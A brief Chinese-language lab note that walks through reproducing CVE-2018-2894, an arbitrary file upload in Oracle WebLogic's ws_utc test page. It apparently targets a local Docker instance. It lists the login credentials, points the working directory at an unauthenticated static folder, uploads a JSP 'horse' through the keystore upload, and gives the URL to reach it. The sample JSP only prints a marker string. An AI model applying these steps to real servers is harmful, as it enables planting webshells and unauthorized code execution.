weblogic任意文件上传
cve-2018-2894
1 先决条件
账号: weblogic 密码: 64MVlbiW
docker-compose logs | grep password
(1)weblogic两个服务页面,开启base_doamin下的web服务测试页
点击base_domain-高级
(2)http://192.168.43.127:7001/ws_utc/config.do
(3)http://192.168.43.127:7001/ws_utc/begin.do
自动跳转到login页面
2 传马
设置当前工作目录,原因是,将目录设置为 ws_utc 应用的静态文件css目录,访问这个目录是无需权限的
u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
传马-http://192.168.43.127:7001/ws_utc/config.do
时间戳_文件名命名
3 访问shell文件
jsp文件内容
<% out.print(“12buopnuinnn000helo”); %>
http://192.168.43.127:7001/ws_utc/css/config/keystore/1620712905228_1.jsp